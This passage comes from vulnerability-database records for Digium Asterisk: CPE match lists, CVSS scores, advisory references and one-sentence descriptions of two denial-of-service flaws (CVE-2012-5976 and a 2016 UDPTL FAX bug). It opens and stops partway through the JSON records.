              "matchCriteriaId": "C63C46CC-02E2-40AF-8281-F2FB5D89823A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "71BAF2A7-024D-475A-88C0-0F5ADE3CA286",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "82F91FE8-C320-466B-AF08-67319A00A2BC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "DCFF0E1C-B455-4C18-8AA1-10408234327B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "738F68B3-2C5E-4A09-8FF4-2D034ED0C54D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "6A60C223-AD68-4BFF-91C1-2C7E9F727AA6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "4C313F81-8B38-4845-B1C7-CBB23D7C99B6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert7:*:*:*:*:*:*",
              "matchCriteriaId": "A08731AB-1E43-48B9-AB4C-0B06A34D0807",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert8:*:*:*:*:*:*",
              "matchCriteriaId": "5A4FBB03-4A60-4A34-855B-74C5079F7769",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert9:*:*:*:*:*:*",
              "matchCriteriaId": "66E97D3F-3AEB-40EB-87E7-18EC7A84F0CA",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "6372EEEA-2759-4B6A-BD03-D84DC956E80E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "26DF0C53-9F6A-4233-B163-AEC1F9886387",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "79A063D7-553F-486F-9079-D95C8047B05E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "B606D854-FC06-4314-AD24-FEEA3796A0AC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "DEBB0786-D912-48D1-BC63-E0F87E078154",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc3:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "1C39DD70-1220-4CC6-95B4-CE18CA5787CD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "B0005F0B-9C87-4160-9416-A7C136FCD5AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "12073B6A-14B1-490B-B267-A68194C68BDD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "198C92F2-8268-4045-B297-17E0D1F9726E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.1:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "BF86A1A0-D3D7-485A-A46C-7619F74CE821",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "5D3A3C00-EA83-4EF4-8681-DB5616132607",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "5FE59F0F-44B0-4940-8368-F360EE610114",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "3647F0E3-196F-486B-9BAB-75ED24A055ED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc3:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "1FBC4A5F-FB16-42B2-9689-25F8B3D0F521",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc4:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "B788D6E2-78E8-4DE1-81F5-40D52263E7F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "51358F60-4D6C-4DBA-86B0-E12C48A67456",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:rc2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "D51C9952-97F4-4326-8F7D-34579D3686AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:rc3:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "3711A75C-AF87-4A5C-8B35-1CF834C12D2A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "E7FFD09D-21A3-4E98-B1FA-C7A16C243D91",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "FAC6591A-BC5A-4CA9-90BC-0B686F74127B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "01BAF29D-8679-40F3-AB6C-DA5C3787271C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "B42229C3-B18E-4D50-9B98-202CB1805CE7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:rc1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "15DF192B-A8D5-4FCC-B469-505A8FA11D00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:rc2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "D24E01F7-604D-4D05-B698-3BDEF7B69EF8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.1:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "A54A74F4-8A6C-4090-88C2-8AB5A606C59B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.2:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "E65E012A-49B6-4796-B1FA-A83C9248D0EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.6.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "9F4C24B7-22E3-4E56-9B9F-414101B627FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.6.1:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "1813B898-F957-40D7-AF9A-064FB57D5C82",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.7.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "C5D07DB0-7C6A-4490-8FD0-DC83568E0421",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple stack consumption vulnerabilities in Asterisk Open Source 1.8.x before 1.8.19.1, 10.x before 10.11.1, and 11.x before 11.1.2; Certified Asterisk 1.8.11 before 1.8.11-cert10; and Asterisk Digiumphones 10.x-digiumphones before 10.11.1-digiumphones allow remote attackers to cause a denial of service (daemon crash) via TCP data using the (1) SIP, (2) HTTP, or (3) XMPP protocol."
    },
    {
      "lang": "es",
      "value": "Multiples vulnerabilidades de consumo en Asterisk Open Source v1.8.x anteriores a v1.8.19.1, v10.x anteriores a v10.11.1, y v11.x anteriores a v11.1.2; Certified Asterisk v1.8.11 anteriores a v1.8.11-cert10; y Asterisk Digiumphones 10.x-digiumphones anteriores a 10.11.1-digiumphones permite a atacantes remotos provocar una denegaci\u00f3n de servicio (ca\u00edde del demonio) a trav\u00e9s de datos TCP usando los protocolos (1) SIP, (2) HTTP, o (3) XMPP."
    }
  ],
  "id": "CVE-2012-5976",
  "lastModified": "2024-11-21T01:45:37.900",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2013-01-04T11:52:14.633",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2012-014"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2013/dsa-2605"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2012-014"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2013/dsa-2605"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2016-02-22 15:59

Modified

2024-11-21 02:48

Severity ?

6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Summary

Asterisk Open Source 1.8.x, 11.x before 11.21.1, 12.x, and 13.x before 13.7.1 and Certified Asterisk 1.8.28, 11.6 before 11.6-cert12, and 13.1 before 13.1-cert3 allow remote authenticated users to cause a denial of service (uninitialized pointer dereference and crash) via a zero length error correcting redundancy packet for a UDPTL FAX packet that is lost.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2016-003.html	Vendor Advisory
cve@mitre.org	http://www.debian.org/security/2016/dsa-3700
cve@mitre.org	http://www.securitytracker.com/id/1034931
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2016-003.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2016/dsa-3700
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1034931

Impacted products

Vendor	Product	Version
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.2.4
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3.1
digium	asterisk	1.8.3.2
digium	asterisk	1.8.3.3
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4.1
digium	asterisk	1.8.4.2
digium	asterisk	1.8.4.3
digium	asterisk	1.8.4.4
digium	asterisk	1.8.5
digium	asterisk	1.8.5
digium	asterisk	1.8.5.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.1
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.1
digium	asterisk	1.8.8.2
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.1
digium	asterisk	1.8.9.2
digium	asterisk	1.8.9.3
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.1
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.1
digium	asterisk	1.8.11.1
digium	asterisk	1.8.11.1
digium	asterisk	1.8.12
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.1
digium	asterisk	1.8.12.2
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.1
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.1
digium	asterisk	1.8.14.1
digium	asterisk	1.8.14.1
digium	asterisk	1.8.15.0
digium	asterisk	1.8.15.0
digium	asterisk	1.8.15.0
digium	asterisk	1.8.15.1
digium	asterisk	1.8.16.0
digium	asterisk	1.8.16.0
digium	asterisk	1.8.16.0
digium	asterisk	1.8.16.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.1
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.1
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.1
digium	asterisk	1.8.20.1
digium	asterisk	1.8.20.2
digium	asterisk	1.8.20.2
digium	asterisk	1.8.21.0
digium	asterisk	1.8.21.0
digium	asterisk	1.8.21.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.1
digium	asterisk	1.8.24.0
digium	asterisk	1.8.24.0
digium	asterisk	1.8.24.0
digium	asterisk	1.8.24.1
digium	asterisk	1.8.25.0
digium	asterisk	1.8.25.0
digium	asterisk	1.8.25.0
digium	asterisk	1.8.26.0
digium	asterisk	1.8.26.0
digium	asterisk	1.8.26.1
digium	asterisk	1.8.27.0
digium	asterisk	1.8.27.0
digium	asterisk	1.8.27.0
digium	asterisk	1.8.28.0
digium	asterisk	1.8.28.0
digium	asterisk	1.8.28.1
digium	asterisk	1.8.28.2
digium	asterisk	1.8.32.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.1
digium	asterisk	11.0.2
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.1
digium	asterisk	11.1.2
digium	asterisk	11.2.0
digium	asterisk	11.4.0
digium	asterisk	11.6.0
digium	asterisk	11.6.0
digium	asterisk	11.6.0
digium	asterisk	11.7.0
digium	asterisk	11.7.0
digium	asterisk	11.7.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.1
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.10.0
digium	asterisk	11.10.0
digium	asterisk	11.10.1
digium	asterisk	11.10.1
digium	asterisk	11.11.0
digium	asterisk	11.11.0
digium	asterisk	11.12.0
digium	asterisk	11.12.0
digium	asterisk	11.13.0
digium	asterisk	11.13.0
digium	asterisk	11.14.0
digium	asterisk	11.14.0
digium	asterisk	11.14.0
digium	asterisk	11.15.0
digium	asterisk	11.15.0
digium	asterisk	11.15.0
digium	asterisk	11.16.0
digium	asterisk	11.16.0
digium	asterisk	11.17.0
digium	asterisk	11.18.0
digium	asterisk	11.18.0
digium	asterisk	11.19.0
digium	asterisk	11.20.0
digium	asterisk	11.21.0
digium	asterisk	11.21.0
digium	asterisk	11.21.0
digium	asterisk	11.21.0
digium	asterisk	12.0.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.1
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.3.0
digium	asterisk	12.3.0
digium	asterisk	12.3.0
digium	asterisk	12.3.1
digium	asterisk	12.3.2
digium	asterisk	12.4.0
digium	asterisk	12.4.0
digium	asterisk	12.5.0
digium	asterisk	12.5.0
digium	asterisk	12.6.0
digium	asterisk	12.6.0
digium	asterisk	12.7.0
digium	asterisk	12.7.0
digium	asterisk	12.7.0
digium	asterisk	12.7.0
digium	asterisk	12.7.1
digium	asterisk	12.8.0
digium	asterisk	12.8.0
digium	asterisk	12.8.0
digium	asterisk	12.8.1
digium	asterisk	12.8.2
digium	asterisk	13.0.0
digium	asterisk	13.0.1
digium	asterisk	13.1.0
digium	asterisk	13.1.0
digium	asterisk	13.1.0
digium	asterisk	13.2.0
digium	asterisk	13.2.0
digium	asterisk	13.3.0
digium	asterisk	13.4.0
digium	asterisk	13.4.0
digium	asterisk	13.5.0
digium	asterisk	13.5.0
digium	asterisk	13.6.0
digium	asterisk	13.7.0
digium	asterisk	13.7.0
digium	asterisk	13.7.0
digium	asterisk	13.7.0
digium	certified_asterisk	1.8.28
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0
digium	certified_asterisk	13.1
digium	certified_asterisk	13.1
digium	certified_asterisk	13.1
digium	certified_asterisk	13.1.0
digium	certified_asterisk	13.1.0
digium	certified_asterisk	13.1.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "522733A7-E89E-4BFD-AC93-D6882636E880",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2FAC47DD-B613-43E4-B9BF-6120B81D9789",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "86D20CB5-60E8-405E-B387-CF80C7DA5E07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "71AB5A01-5961-4053-9111-CF32C6473A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "77D8E1DC-041F-4B87-AF9A-E0EC4D6A4BD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7CCCB892-30CE-4BEF-904E-5D957F94D0EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F156798F-F2EF-4366-B17E-03165AB437D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EFBB9A6-DD1D-436E-919F-74A3E4F40396",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "054E34C8-B6A5-48C7-938E-D3C268E0E8BB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1DCECA72-533A-4A95-AB19-20C5F09A1B01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0E2309F8-AFEE-4150-99D1-BA606432ED73",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7785F282-BFA0-400A-8398-872ACCA4BF37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1278D3FB-78C6-4F7D-A845-0A93D4F6E2B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C00A6EFB-A848-46D3-AAD7-FD8140007E42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB6E3972-5C53-4B6D-BFE1-67E1122EA013",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "048617A0-A783-4519-A947-35220D4CD786",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "DD493A41-E686-444C-A34E-412804510F77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87D25FD6-CC3A-4AB0-B7B1-67D07386F99D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C402E9E-09CC-4EFA-AC27-156437B05B22",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C8A41F9C-D2F4-47A9-80CD-2B1BF6B0CB63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "627FF5B9-E5A8-4DBC-A891-B175011E72A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6146EB2E-BA32-4408-B10B-A711EC39C580",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1C863324-05AE-4FCA-BD2E-39040A468DCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A85F51E7-0AAE-4F3B-9F90-BD2E31255822",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "315FB0D4-D4A4-4369-BFB8-F2CAEB429015",
              "vulnerable": true
            },
            {
